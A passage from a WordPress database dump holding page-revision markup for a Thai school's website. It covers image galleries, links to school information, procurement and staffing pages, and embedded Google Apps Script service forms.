class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\" width=\"100%\" height=\"1200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n</p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-07 14:21:04','2025-07-07 07:21:04','',459,'http://pakhaeng.ssk.in.th/?p=1739',0,'revision','',0),
(1740,1,'2025-07-07 14:29:41','2025-07-07 07:29:41','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 